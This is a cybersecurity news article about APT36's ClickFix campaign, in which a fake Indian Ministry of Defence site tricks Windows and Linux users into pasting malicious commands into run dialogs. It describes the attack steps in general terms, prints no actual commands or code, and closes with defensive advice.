APT36 Uses ClickFix Attacks to Target Windows and Linux Users

A new cyberattack campaign using the ClickFix social engineering method is now targeting both Windows and Linux systems, according to cybersecurity researchers at Hunt.io.

ClickFix is a technique where attackers trick users into running malicious commands by displaying fake application errors or verification prompts. Traditionally, these attacks have focused on Windows users, asking them to paste PowerShell commands into the Run dialog, which then installs malware like info-stealers or even ransomware.

In 2024, a similar attack was seen targeting macOS users through fake Google Meet errors. Now, a recent campaign has extended this tactic to Linux users for the first time.

APT36 Behind New Campaign

The latest attack has been linked to APT36, also known as Transparent Tribe, a hacking group believed to be based in Pakistan. The group is using a fake website that imitates India’s Ministry of Defence. The site displays a link to a supposed official press release.

Once a user clicks the link, the site detects the operating system and redirects the user to a tailored attack path.

• For Windows users: The site displays a warning about content usage rights. When users click 'Continue,' a malicious MSHTA command is copied to their clipboard. They are then instructed to paste it into the Windows Run dialog. This launches a .NET-based loader that connects to the attacker’s server while showing a fake PDF to appear legitimate.

• For Linux users: The site shows a fake CAPTCHA page. Clicking the "I'm not a robot" button copies a shell command to the clipboard. Users are then told to press ALT+F2 to open the Linux run dialog, paste the command, and press Enter. This command downloads a script called 'mapeal.sh' that currently only fetches a JPEG image from the attacker's server.

Hunt.io notes that this version of the Linux script does not perform any harmful actions. It simply downloads and opens an image in the background. However, researchers warn that the group may be testing this method and could replace the image with actual malware in future versions.

All Major Operating Systems Affected

The expansion of ClickFix to Linux shows how effective this technique has become. It has now been used against all three major desktop operating systems: Windows, macOS, and Linux.

Cybersecurity experts advise users not to copy and paste any commands into Run dialogs unless they fully understand what the command does. Doing so can lead to malware infections and the loss of sensitive information.